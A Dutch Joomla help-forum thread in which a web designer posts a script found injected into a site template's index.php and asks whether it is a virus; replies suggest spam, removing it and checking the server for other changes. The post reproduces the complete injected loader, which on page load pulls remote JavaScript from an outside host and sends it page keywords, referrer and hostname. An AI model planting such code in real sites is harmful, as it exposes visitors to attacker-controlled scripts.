Storende code - virus?

  • Wim
  • Onderwerp Auteur
  • Gebruiker
  • Gebruiker
  • Onder de merknaam interlijn.nl lever ik 'praktisch webdesign': goedwerkende sites op basis van een t
Meer
03 jul 2016 17:38 #1789 door Wim
Storende code - virus? werd gestart door Wim
In een site gaf een virusscanner een foutmelding. Bleek dat er in index.php van het template deze code was toegevoegd:
Code:
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://12tharmoredmuseum.hostguardian.com/js/jquery.min.php?c_utt=SWBB8&c_utm='+encodeURIComponent('http://12tharmoredmuseum.hostguardian.com/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

Ik ben niet zo goed in code.
Weet iemand wat dit voor een storende code is?

Interlijn.nl, praktisch webdesign.
Discussie gesloten.
  • Rondeb
  • Gebruiker
  • Gebruiker
  • Joomla
Meer
03 jul 2016 17:38 #1790 door Rondeb
Beantwoord door Rondeb in topic Storende code - virus?
Hallo,

lijkt op spam in de code staat de url 12tharmoredmuseum.hostguardian is die bekend bij je? vermoed van niet.

Als ik zoek via google kom ik een aantal spam meldingen tegen.

Draai je laatste Joomla versie? zijn alle extensies up to date?

Groeten Ron :D
Discussie gesloten.
  • Wim
  • Onderwerp Auteur
  • Gebruiker
  • Gebruiker
  • Onder de merknaam interlijn.nl lever ik 'praktisch webdesign': goedwerkende sites op basis van een t
Meer
03 jul 2016 17:38 #1791 door Wim
Beantwoord door Wim in topic Storende code - virus?
Ja ik vermoed ook dat het alleen spam genereert vanaf of naar dat rare wapenmuseum.
Alles is up to date, maar site draait op een server die ikzelf niet uitkoos maar de eigenaar van de site. Volgens mij had die zijn beveiliging niet helemaal in orde.

Ik wilde hier vooral weten of die code op een virus zou duiden. Lijkt mij niet, maar hiervoor ontbreekt het mij aan kennis.
Dank tot zover.

Interlijn.nl, praktisch webdesign.
Discussie gesloten.
  • Gast
  • Gebruiker
  • Gebruiker
Meer
03 jul 2016 17:38 #1792 door Gast
Beantwoord door Gast in topic Storende code - virus?

Tralala;130045 schreef : In een site gaf een virusscanner een foutmelding. Bleek dat er in index.php van het template deze code was toegevoegd:

Ik ben niet zo goed in code.
Weet iemand wat dit voor een storende code is?

Kun je de code niet weghalen?
Discussie gesloten.
  • Wim
  • Onderwerp Auteur
  • Gebruiker
  • Gebruiker
  • Onder de merknaam interlijn.nl lever ik 'praktisch webdesign': goedwerkende sites op basis van een t
Meer
03 jul 2016 17:38 #1793 door Wim
Beantwoord door Wim in topic Storende code - virus?
Tuurlijk, code is verwijderd.
Dus @Rondeb, er niks meer te zien.

Ik ga er maar vanuit dat het eerder een grappenmaker met geldingsdrang was dan een grijpgeile gevaarlijk gek. Maar ik peilde hier of iemand er meer over wist.

Interlijn.nl, praktisch webdesign.
Discussie gesloten.
  • Gast
  • Gebruiker
  • Gebruiker
Meer
03 jul 2016 17:38 #1794 door Gast
Beantwoord door Gast in topic Storende code - virus?
Je doet er verstandig aan om via ftp eens te kijken of je nog andere gekke dingen tegenkomt, b.v. bestanden die de laatste tijd gewijzigd zijn, afbeeldingen met rare namen, dat soort dingen. En daarnaast ook regelmatig te kijken of de hack of iets vergelijkbaars niet terug is gekomen. Als alles up-to-date is, dan is die regel er toch ingekomen en het is niet gezegd dat dit het enige bestand is waar wat mee geknutseld is of dat de knutselaar niet op herhalingsoefening gaat nu hij de opties weet.
Discussie gesloten.
Gemaakt door Kunena